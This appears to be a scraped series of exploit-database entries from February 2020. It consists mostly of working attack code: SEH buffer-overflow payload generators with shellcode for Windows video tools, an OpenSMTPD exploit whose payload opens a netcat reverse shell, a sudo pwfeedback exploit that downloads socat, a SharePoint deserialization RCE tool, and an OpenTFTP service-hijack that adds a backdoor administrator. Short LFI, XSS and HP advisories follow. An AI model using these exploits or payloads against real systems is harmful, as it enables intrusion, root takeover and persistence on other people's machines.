Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.wedding-slideshow-studio.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "name.txt". #2. Just copy the text inside "name.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 256 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x100411fc) #0x100411fc : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll) long_buffer = "\x44" * 600 shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += 
"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode + long_buffer try: f=open("name.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution
# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation # Date: 2020-02-02 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.opensmtpd.org/ # Version: OpenSMTPD 6.4.0 - 6.6.1 # Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 # CVE: CVE-2020-7247 #!/usr/bin/perl # # raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD # Copyright (c) 2020 Marco Ivaldi <[email protected]> # # smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and # other products, allows remote attackers to execute arbitrary commands as root # via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL # FROM field. This affects the "uncommented" default configuration. The issue # exists because of an incorrect return value upon failure of input validation # (CVE-2020-7247). # # "Wow. I feel all butterflies in my tummy that bugs like this still exist. # That's awesome :)" -- skyper # # This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to # root on OpenBSD in the default configuration, or execute remote commands as # root (only in OpenSMTPD "uncommented" default configuration). # # See also: # https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt # https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/ # https://www.kb.cert.org/vuls/id/390745/ # https://www.opensmtpd.org/security.html # # Usage (LPE): # phish$ uname -a # OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64 # phish$ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel) # phish$ ./raptor_opensmtpd.pl LPE # [...] # Payload sent, please wait 5 seconds... # -rwsrwxrwx 1 root wheel 12432 Feb 1 21:20 /usr/local/bin/pwned # phish# id # uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) # # Usage (RCE): # raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org # [...] # Payload sent, please wait 5 seconds... 
# /bin/sh: No controlling tty (open /dev/tty: Device not configured) # /bin/sh: Can't find tty file descriptor # /bin/sh: warning: won't have full job control # phish# id # uid=0(root) gid=0(wheel) groups=0(wheel) # # Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1): # OpenBSD 6.6 [tested] # OpenBSD 6.5 [untested] # OpenBSD 6.4 [untested] # Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested] # Other Linux distributions [untested] # FreeBSD [untested] # NetBSD [untested] # use IO::Socket::INET; print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n"; print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n"; $usage = "Usage:\n". "$0 LPE\n". "$0 RCE <remote_host> <local_host> [<domain>]\n"; $lport = 4444; ($type, $rhost, $lhost, $domain) = @ARGV; die $usage if (($type ne "LPE") && ($type ne "RCE")); # Prepare the payload if ($type eq "LPE") { # LPE $payload = "cp /bin/sh /usr/local/bin/pwned\n". "echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n". "gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned"; $rhost = "127.0.0.1"; } else { # RCE die $usage if ((not defined $rhost) || (not defined $lhost)); $payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|". 
"nc $lhost $lport >/tmp/f"; } # Open SMTP connection $| = 1; $s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n"; # Read SMTP banner $r = <$s>; print "< $r"; die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/); # Send HELO $w = "HELO fnord"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send evil MAIL FROM $w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send RCPT TO if (not defined $domain) { $rcpt = "<root>"; } else { $rcpt = "<root\@$domain>"; } $w = "RCPT TO:$rcpt"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send payload in DATA $w = "DATA"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; $w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n."; #print "> $w\n"; # uncomment for debugging print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Close SMTP connection $s->close(); print "\nPayload sent, please wait 5 seconds...\n"; # Got root? if ($type eq "LPE") { # LPE sleep 5; print `ls -l /usr/local/bin/pwned`; exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n"; } else { # RCE exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat #exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat }
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
#!/bin/bash # We will need socat to run this. if [ ! -f socat ]; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat chmod +x socat fi cat <<EOF > xpl.pl \$buf_sz = 256; \$askpass_sz = 32; \$signo_sz = 4*65; \$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24); print("\x00\x15"x(\$buf_sz+\$askpass_sz) . ("\x00\x15"x\$signo_sz) . (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x15"x104 . "\n"); EOF cat <<EOF > exec.c #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/stat.h> #include <stdlib.h> #include <unistd.h> int main(void) { printf("Exploiting!\n"); int fd = open("/proc/self/exe", O_RDONLY); struct stat st; fstat(fd, &st); if (st.st_uid != 0) { fchown(fd, 0, st.st_gid); fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); } else { setuid(0); execve("/bin/bash",NULL,NULL); } return 0; } EOF cc -w exec.c -o /tmp/pipe ./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"& sleep 0.5 export SUDO_ASKPASS=/tmp/pipe sudo -k -S id < /tmp/pty /tmp/pipe
Microsoft SharePoint - Deserialization Remote Code Execution
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import sys from xml.sax.saxutils import escape from lxml import html import codecs import readline from clint.arguments import Args import signal def serialize_command(cmd): total = "" for x in cmd: a = codecs.encode(x,"utf-16be") b = codecs.encode(a,"hex").decode('ascii') total += b[::-1] return total def deserialize_command(cmd): length = len(cmd) s = "" for i in range(0,length,4): character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3] character = character[::-1] c_hex = codecs.decode(character,"hex") a = codecs.decode(c_hex,"utf-16be") s += a return s ####################################### signal.signal(signal.SIGINT, signal.default_int_handler) args = Args() myargs = dict(args.grouped) if '--help' in myargs or '-h' in myargs: help = """ desharialize options: -h --help - This menu -u --url - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx ) -c --command - The command to run on the target Sharepoint server. 
-f --file - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping) """ print (help) exit(0) url = '' cmd = '' filename = '' if '--url' in myargs or '-u' in myargs: try: url = myargs['--url'][0] except: url = myargs['-u'][0] if '--command' in myargs or '-c' in myargs: if '--file' in myargs or '-f' in myargs: print("Can't use both command and file options at the same time!") exit(0) try: cmd = myargs['--command'][0] except: cmd = myargs['-c'][0] if '--file' in myargs or '-f' in myargs: try: filename = myargs['--file'][0] except: filename = myargs['-f'][0] file = open(filename,mode='r') cmd = file.read() file.close() sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; PY2 = sys.version_info[0] == 2 PY3 = sys.version_info[0] == 3 if PY3: string_types = str, raw_input = input else: string_types = basestring, if url == '': url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:") headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0', } firstcall = requests.get(url,headers=headers) spheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16') spheader = int(spheader.split('.')[0]) payload = "__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" assemblyvalue = sharepoint2019and2016 if spheader == 15: assemblyvalue = sharepoint2013 elif spheader == 14: assemblyvalue = sharepoint2010 else: assemblyvalue = sharepoint2019and2016 FullURL = url + assemblyvalue 
secondcall = requests.get(FullURL,headers=headers) secondcalltext = secondcall.text tree = html.fromstring(secondcall.content) viewstate = '' eventvalidation = '' try: viewstate = tree.get_element_by_id('__VIEWSTATE') viewstate = viewstate.value except: pass try: eventvalidation = tree.get_element_by_id('__EVENTVALIDATION') eventvalidation = eventvalidation.value except: pass if cmd == '': cmd = raw_input("Write your full command here to execute on the test target system (Make sure you have permissions from system owner):") #escapedcmd = escape(cmd,html_escape_table) cmd = cmd.replace("&","&") cmd = cmd.replace(">",">") cmd = cmd.replace("<","<") cmd = cmd.replace("\"",""") cmd = cmd.replace("'","'") escapedcmd = escape(cmd) print(escapedcmd) srlcmd = serialize_command(escapedcmd) length = 1448 + len(escapedcmd) hex_length = format(length * 4,'x') serialized_length = hex_length[::-1] payload = payload.replace("e200e200e200140024003400e200e200e200",srlcmd) payload = payload.replace("zzzz",serialized_length) print("Deserialized Payload:") print(deserialize_command(payload[8:])) data = {"__VIEWSTATE":viewstate,"__EVENTVALIDATION":eventvalidation,"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData":payload} thirdcall = requests.post(FullURL, data=data,headers=headers) print("Payload launched! Check execution results. Exiting...")
MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-11 #Vendor Homepage : http://www.ivideogo.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "Shell.txt". #2. Just copy the text inside "Shell.txt". #3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" . #4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x1004f3e3) #0x1004f3e3 : pop ebx # pop esi # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" 
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("Shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-11 #Vendor Homepage : http://www.ivideogo.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "exploit.txt". #2. Just copy the text inside "exploit.txt". #3. Start the program. In the new window click "Options" > "Settins" . #4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10045ebb) #0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += 
"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
HP System Event Utility - Local Privilege Escalation
# Exploit Title: HP System Event Utility - Local Privilege Escalation # Author: hyp3rlinx # Date: 2020-02-11 # Vendor: www.hp.com # Link: https://hp-system-event-utility.en.lo4d.com/download # CVE: CVE-2019-18915 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.hp.com [Product] HP System Event Utility The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc. HP System Event Utility enables the functioning of special function keys on select HP devices. [Vulnerability Type] Local Privilege Escalation [CVE Reference] CVE-2019-18915 [Security Issue] The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. HPMSGSVC.exe runs a background process that delivers push notifications. The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe" if one is found in the user's c:\ drive. Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe Two handles are inherited; their properties are Write/Read, Name: \Device\ConDrv This results in an arbitrary-code-execution persistence mechanism if an attacker can place an EXE in this location, and it can be used to escalate privileges from Admin to SYSTEM. HP has released (or is releasing) a mitigation: https://support.hp.com/us-en/document/c06559359 [References] PSR-2019-0204 https://support.hp.com/us-en/document/c06559359 [Network Access] Local [Disclosure Timeline] Vendor Notification: October 7, 2019 HP PSRT "product team will address the issue in next release" : January 13, 2020 HP advisory and mitigation release : February 10, 2020 February 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow # Exploit Author : ZwX # Exploit Date: 2020-02-11 # Vendor Homepage : http://www.ivideogo.com/ # Tested on OS: Windows 10 v1803 # Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "Shell.txt". #2. Just copy the text inside "Shell.txt". #3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" . #4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10039291) #0x10039291 : pop ecx # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += 
"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("Shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
WordPress Plugin Tutor.1.5.3 - Local File Inclusion
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] ================================================================================= contact me: telegram: @MF0584 gmail: [email protected] =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] =================================================================================
WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Title: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /Quiz.php =================================================================== Vulnerable Source: 473: echo echo $topic_id; 447: $topic_id = sanitize_text_field($_POST['topic_id']); =================================================================== Exploit: localhost/wp-content/plugins/tutor/classes/Quiz.php $_POST('topic_id') = <script>alert('mehran')</script> =================================================================================
OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation # Exploit Author: boku # Date: 2020-02-12 # Vendor Homepage: https://sourceforge.net/projects/tftp-server/ # Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download # Version: 1.66 # Tested On: Windows 10 (32-bit) # About: # "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, # Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." # Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/ # Vulnerability Details: # On Windows, Open TFTP Server v1.66 suffers from insecure file & folder permissions. # This allows a low-privilege, local attacker to escalate their permissions to Administrator # by replacing the 'TFTPServer' service binary with a maliciously crafted binary executable. # The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' privileges, after the # default installation. After the attacker has planted the malicious binary, the code will # be executed with System privileges on the next boot of the Windows device. See PoC below for details.
## Service Information (there is also an Unquoted Service Path) C:\>sc qc TFTPServer SERVICE_NAME: TFTPServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Open TFTP Single Port Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem ## Insecure Folder Permission C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C ## Insecure File/Service Permission C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) ## Local Privilege Escalation Proof of Concept #0. Download & install Open TFTP Server v1.66 #1. Create low privileged user & change to the user C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" User name lowPrivUser Local Group Memberships *Users Global Group memberships *None C:\>whoami mycomputer\lowprivuser #2. Move the Service EXE to a new name C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe 1 file(s) moved. #3. Create malicious binary on kali linux 1) Download dependencies root@kali# apt install gcc-mingw-w64-i686 wine64 -y 2) Add Admin User C Code root@kali# cat addAdmin.c #include<windows.h> int main(void){ system("net user hacker mypassword /add"); system("net localgroup Administrators hacker /add"); WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0); return 0; } 3) Compile Code root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe #4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host #5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\ 1 file(s) moved. 
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe" 02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe 02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe #6. Reboot the Computer #7. Look at that new Admin C:\Users\lowPrivUser>net users hacker | findstr "Local name active" User name hacker Account active Yes Local Group Memberships *Administrators *Users C:\Users\lowPrivUser>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator boku hacker
WordPress Plugin Wordfence.7.4.5 - Local File Disclosure
